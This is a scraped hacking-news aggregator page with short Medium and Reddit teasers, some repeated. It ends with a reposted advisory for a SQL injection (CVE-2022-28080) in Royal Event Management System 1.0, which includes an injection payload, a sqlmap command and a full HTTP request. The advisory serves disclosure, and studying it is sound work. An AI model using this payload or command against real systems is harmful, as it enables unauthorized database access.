Hacking Articles Tips Tricks Videos Tutorials
Photo
Passive/Active Information Gathering: Subdomain Enumeration
https://medium.com/@fath3ad.22/passive-active-information-gathering-subdomain-enumeration-e5538c3d3ecc?source=rss------bug_bounty-5
https://medium.com/@fath3ad.22/passive-active-information-gathering-subdomain-enumeration-e5538c3d3ecc?source=rss------bug_bounty-5
This post is design to share some of the information I’ve learned while working through the Information Gathering- Web Edition module in…Continue reading on Medium » (https://medium.com/@fath3ad.22/passive-active-information-gathering-subdomain-enumeration-e5538c3d3ecc?source=rss------bug_bounty-5)
How To Handle The Aftermath Of A Cyber Attack
https://0xshakhawat.medium.com/how-to-handle-the-aftermath-of-a-cyber-attack-be12da016e24?source=rss------bug_bounty-5
https://0xshakhawat.medium.com/how-to-handle-the-aftermath-of-a-cyber-attack-be12da016e24?source=rss------bug_bounty-5
Once a breach or an attack happens, the company should try to resolve the
issue in 30 days or less. During that time, the team should…Continue reading on Medium » (https://0xshakhawat.medium.com/how-to-handle-the-aftermath-of-a-cyber-attack-be12da016e24?source=rss------bug_bounty-5)
issue in 30 days or less. During that time, the team should…Continue reading on Medium » (https://0xshakhawat.medium.com/how-to-handle-the-aftermath-of-a-cyber-attack-be12da016e24?source=rss------bug_bounty-5)
Deep Web
best VPN out there
Looking for your VPN recommendations! Let me know your favorite one!
submitted by /u/fastfunds
[link] [comments]
best VPN out there
Looking for your VPN recommendations! Let me know your favorite one!
submitted by /u/fastfunds
[link] [comments]
reddit
best VPN out there
Looking for your VPN recommendations! Let me know your favorite one!
AI Can Write Code Like Humans — Bugs and All
https://medium.com/@tunewearsnepal/ai-can-write-code-like-humans-bugs-and-all-9ba5faf992a9?source=rss------bug_bounty-5
https://medium.com/@tunewearsnepal/ai-can-write-code-like-humans-bugs-and-all-9ba5faf992a9?source=rss------bug_bounty-5
New tools that help developers write software also generate similar mistakes.Continue reading on Medium » (https://medium.com/@tunewearsnepal/ai-can-write-code-like-humans-bugs-and-all-9ba5faf992a9?source=rss------bug_bounty-5)
AI Can Write Code Like Humans — Bugs and All
New tools that help developers write software also generate similar mistakes.Continue reading on Medium »
Read more...
New tools that help developers write software also generate similar mistakes.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Royal Event Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Royal Event Management System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
Royal Event Management System 1.0 SQL Injection
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Royal Event Management System version 1.0 suffers from a remote SQL injection vulnerability.
SHA-256 |
884c0f6e25d5c7878c15b69a5867168b87afcc090d923b7b1d8d3da4f3da329dDownload
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)
# Date: 2022-26-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-28080
# References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080
------------------------------------------------------------------------------------
1. Description:
----------------------
Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in
/royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'todate' parameter and save it like poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean-based)
-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns
4. Burpsuite request:
----------------------
POST /royal_event/btndates_report.php#?= HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 334
Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0
Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380
Referer: http://localhost/royal_event/btndates_report.php#?=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="todate"
-1' OR 1=1 OR 'ns'='ns
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="search"
3
--f289a6438bcc45179bcd3eb7ddc555d0
Content-Disposition: form-data; name="fromdate"
01/01/2011
--f289a6438bcc45179bcd3eb7ddc555d0--
Source:packetstormsecurity.com